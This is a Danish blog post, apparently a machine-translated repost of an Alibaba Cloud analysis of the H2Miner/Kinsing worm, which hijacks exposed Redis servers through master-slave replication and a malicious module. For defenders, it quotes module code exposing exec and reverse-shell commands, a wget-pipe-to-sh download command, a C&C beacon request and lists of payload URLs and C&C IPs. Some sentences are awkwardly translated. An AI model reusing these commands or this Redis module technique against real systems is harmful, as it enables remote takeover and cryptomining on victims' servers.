For en dag siden blev en af mit projekts servere angrebet af en lignende orm. På jagt efter et svar på spørgsmålet "hvad var det?" Jeg fandt en god artikel af Alibaba Cloud Security-teamet. Da jeg ikke fandt denne artikel om Habré, besluttede jeg at oversætte den specielt til dig <3
Indrejse
For nylig opdagede Alibaba Clouds sikkerhedsteam et pludseligt udbrud af H2Miner. Denne type ondsindet orm bruger den manglende autorisation eller svage adgangskoder til Redis som gateways til dine systemer, hvorefter den synkroniserer sit eget ondsindede modul med slaven gennem master-slave-synkronisering og til sidst downloader dette ondsindede modul til den angrebne maskine og udfører ondsindet modul. instruktioner.
Tidligere blev angreb på dine systemer primært udført ved hjælp af en metode, der involverede planlagte opgaver eller SSH-nøgler, der blev skrevet til din maskine, efter at angriberen loggede på Redis. Heldigvis kan denne metode ikke bruges ofte på grund af problemer med tilladelseskontrol eller på grund af forskellige systemversioner. Imidlertid kan denne metode til at indlæse et ondsindet modul direkte udføre angriberens kommandoer eller få adgang til skallen, hvilket er farligt for dit system.
På grund af det store antal Redis-servere, der hostes på internettet (næsten 1 million), anbefaler Alibaba Clouds sikkerhedsteam, som en venlig påmindelse, at brugere ikke deler Redis online og regelmæssigt tjekker styrken af deres adgangskoder, og om de er kompromitteret. hurtigt valg.
H2Miner
H2Miner er et mining-botnet til Linux-baserede systemer, der kan invadere dit system på en række forskellige måder, herunder manglende autorisation i Hadoop-garn, Docker og Redis remote command execution (RCE) sårbarheder. Et botnet fungerer ved at downloade ondsindede scripts og malware for at mine dine data, udvide angrebet horisontalt og vedligeholde kommando og kontrol (C&C) kommunikation.
Redis RCE
Viden om dette emne blev delt af Pavel Toporkov på ZeroNights 2018. Efter version 4.0 understøtter Redis en plug-in-indlæsningsfunktion, der giver brugerne mulighed for at indlæse, så filer kompileret med C i Redis for at udføre specifikke Redis-kommandoer. Denne funktion, selvom den er nyttig, indeholder en sårbarhed, hvor filer i master-slave-tilstand kan synkroniseres med slaven via fuld resync-tilstand. Dette kan bruges af en angriber til at overføre ondsindede filer. Efter overførslen er fuldført, indlæser angriberne modulet på den angrebne Redis-instans og udfører enhver kommando.
Malware-ormeanalyse
For nylig opdagede Alibaba Cloud-sikkerhedsteamet, at størrelsen af H2Miners ondsindede minearbejdergruppe pludselig er steget dramatisk. Ifølge analysen er den generelle proces for angrebsforekomst som følger:
H2Miner bruger RCE Redis til et fuldgyldigt angreb. Angribere angriber først ubeskyttede Redis-servere eller servere med svage adgangskoder.
Så bruger de kommandoen config set dbfilename red2.so for at ændre filnavnet. Herefter udfører angriberne kommandoen slaveof for at indstille master-slave-replikeringsværtsadressen.
Når den angrebne Redis-instans etablerer en master-slave-forbindelse med den ondsindede Redis, som ejes af angriberen, sender angriberen det inficerede modul ved hjælp af fullresync-kommandoen til at synkronisere filerne. Red2.so-filen vil derefter blive downloadet til den angrebne maskine. Angriberne bruger derefter ./red2.so-indlæsningsmodulet til at indlæse denne so-fil. Modulet kan udføre kommandoer fra en angriber eller starte en omvendt forbindelse (bagdør) for at få adgang til den angrebne maskine.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Efter at have udført en ondsindet kommando som f.eks / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, vil angriberen nulstille backupfilnavnet og fjerne systemmodulet for at rydde op i sporene. Red2.so-filen vil dog stadig forblive på den angrebne maskine. Brugere rådes til at være opmærksomme på tilstedeværelsen af en sådan mistænkelig fil i mappen til deres Redis-instans.
Ud over at dræbe nogle ondsindede processer for at stjæle ressourcer, fulgte angriberen et ondsindet script ved at downloade og udføre ondsindede binære filer til . Dette betyder, at procesnavnet eller mappenavnet, der indeholder kinsing på værten, kan indikere, at den pågældende maskine er blevet inficeret af denne virus.
Ifølge resultaterne af reverse engineering udfører malwaren hovedsageligt følgende funktioner:
- Upload af filer og eksekvering af dem
- Minedrift
- Vedligeholdelse af C&C-kommunikation og eksekvering af angriberkommandoer
Brug masscan til ekstern scanning for at udvide din indflydelse. Derudover er IP-adressen på C&C-serveren hårdkodet i programmet, og den angrebne vært vil kommunikere med C&C-kommunikationsserveren ved hjælp af HTTP-anmodninger, hvor zombie-informationen (kompromitteret server) identificeres i HTTP-headeren.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Andre angrebsmetoder
Adresser og links brugt af ormen
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Rådet
For det første bør Redis ikke være tilgængelig fra internettet og bør beskyttes med en stærk adgangskode. Det er også vigtigt, at klienter tjekker, at der ikke er nogen red2.so-fil i Redis-mappen, og at der ikke er nogen "kinsing" i fil-/procesnavnet på værten.
Kilde: www.habr.com